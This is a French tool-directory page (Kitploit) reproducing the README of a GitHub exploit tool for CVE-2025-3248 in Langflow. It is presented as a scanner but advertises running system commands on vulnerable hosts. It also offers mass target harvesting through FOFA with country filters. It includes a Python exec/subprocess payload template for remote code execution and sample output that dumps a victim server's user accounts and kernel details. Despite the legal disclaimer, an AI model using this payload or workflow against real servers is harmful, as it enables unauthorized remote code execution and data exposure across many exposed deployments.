Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3248 — Un scanner de vulnérabilités pour CVE-2025-3248 dans les applications Langflow. Un outil pour scanner la vulnérabilité CVE-2025-3248 dans les applications Langflow. | Kitploit
Outils/GitHubGitHub/xuemian168/cve-2025-3248
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsCommandement et Contrôle
GitHubxuemian168/cve-2025-3248

CVE-2025-3248

Un scanner de vulnérabilités pour CVE-2025-3248 dans les applications Langflow. Un outil pour scanner la vulnérabilité CVE-2025-3248 dans les applications Langflow.

Voir le dépôt
1027il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Site web
Partager

中文 | English

Scanner de vulnérabilités Langflow

Un scanner de vulnérabilités pour CVE-2025-3248 dans les applications Langflow.

Fonctionnalités

  • Scanner une cible unique ou plusieurs cibles à l'aide de FOFA
  • Exécuter des commandes système sur les cibles vulnérables
  • Récupérer les informations système
  • Prise en charge de payloads personnalisés
  • Barre de progression pour l'analyse FOFA
  • Belle interface CLI

Installation

  1. Clonez le dépôt :
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
  1. Installez les dépendances :
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
  1. Modifier le fichier d'environnement (optionnel)
# After you finish editing
mv .env.example .env

Utilisation

Analyse d'une cible unique

python main.py -t https://target.com

Utilisation de l'API FOFA

python main.py --fofa-email [email protected] --fofa-key your_api_key

Options supplémentaires

  • -t, --target : URL cible à analyser
  • --fofa-email : E-mail de l'API FOFA
  • --fofa-key : Clé de l'API FOFA
  • --fofa-query : Requête de recherche FOFA (défaut : 'app="LOGSPACE-LangFlow"')
  • --country : Filtrer les résultats par code pays (p. ex. CN, US)
  • --max-pages : Nombre maximal de pages FOFA à récupérer (défaut : 5)
  • --page-size : Résultats par page (défaut : 100)
  • --timeout : Délai d'expiration des requêtes en secondes (défaut : 10)
  • --no-verify : Désactiver la vérification SSL
  • --threads : Nombre de threads pour l'analyse concurrente (défaut : 5)
  • -f, --file : Fichier Python personnalisé à utiliser comme payload

Payloads personnalisés

Vous pouvez créer des payloads personnalisés en créant un fichier Python :

def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass

Utilisez-le ensuite avec :

python main.py -t https://target.com -f your_payload.py

Exemple de sortie

    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux

Avertissement

⚠️ Avertissement Cet outil est réservé à des fins légales. Il est conçu à des fins éducatives, pour les tests de sécurité internes des entreprises ou pour une utilisation dans des environnements autorisés. Il est strictement interdit d'utiliser cet outil sur tout système, réseau ou appareil non autorisé, sous peine de violer les lois et réglementations en vigueur.

Les utilisateurs assument l'entière responsabilité légale de leurs actions. L'auteur et les contributeurs ne sont pas responsables des pertes, fuites de données ou conséquences juridiques causées par une mauvaise utilisation de cet outil.

⚠️ Ne pas utiliser pour des attaques illégales. Ne pas tenter de déployer ou d'exécuter cet outil sur des systèmes non autorisés.

Références

  • https://github.com/langflow-ai/langflow/releases/tag/1.3.0
  • https://github.com/langflow-ai/langflow/pull/6911
  • https://www.cve.org/cverecord?id=CVE-2025-3248

Licence

Licence MIT

Télécharger l’outil